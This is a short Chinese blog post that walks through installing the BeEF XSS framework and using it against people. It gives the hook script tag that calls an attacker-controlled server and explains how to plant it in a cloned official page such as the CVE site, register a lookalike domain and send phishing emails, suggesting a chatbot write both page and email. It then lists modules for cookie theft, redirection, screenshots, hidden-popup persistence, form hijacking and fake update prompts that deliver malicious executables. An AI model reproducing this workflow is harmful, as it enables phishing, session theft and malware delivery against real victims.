beef-xss
安装
参考:https://cloud.tencent.com/developer/article/2196746
apt-get install beef-xss
启动 beef-xss
beef-xss
关闭 beef-xss
beef-xss-stop
钓鱼
精华就在于把下面这句 js 代码插入前端文件中(要在实战环境中利用需要端口转发)
<script src="http://ip:3000/hook.js"></script>
可以让 gpt 写一个静态的 html 页面,简单伪造一下,然后把这段 js 代码插入其中
部署 html 文件到公网服务器上,点击链接浏览器便会被挂上钩子。
也可以直接下载网页的 html 文件,然后在其中插入 js 代码后,同样上传到公网服务器。还可以注册个看起来比较官方的域名或者用在线的域名进行 302 重定向,然后发送钓鱼邮件诱导他人点击链接即可。
例如这里直接下载 cve 官方平台的 html,在其中插入 js 代码,由于我没有绑定域名,随便用个在线域名进行重定向到部署了该 html 的服务器,钓鱼邮件就随便写,也可以让 gpt 写个钓鱼邮件
点击该链接就会到我们部署的页面
至此钩子已经挂上了。当然钓鱼方法多种多样,远不止此。
使用
xss弹窗
模块见下图
执行后对方的浏览器网页就会弹出该命令
其实这个模块更像是执行 js 代码,可以执行其他代码,还有
效果:
cookie 窃取
这个 cookie 窃取就不用多说了,
也可以使用模块功能进行获取,
重定向
直接重定向到其他页面
浏览器截图
前提是谷歌浏览器
权限维持
弹出一个在角落的不起眼的小页面,这个页面里包含了我们的恶意JS代码,这个也是用于权限维持的,因为目标关闭当前页面就会导致BeEF的会话掉线,但如果目标没有关掉小窗口,那么会话就还是会一直在线
劫持输入表单
可以通过构造个全是表格的前端信息,诱导他人进行填写然后利用该模块获取他人信息。
虚假通知栏
这个可以把插件换为恶意的 exe 文件,然后下载运行后进行上线。比如可以伪造一个游戏下载的网页......
标签:xss,beef,代码,js,html,安装,页面 From: https://www.cnblogs.com/gaorenyusi/p/18433465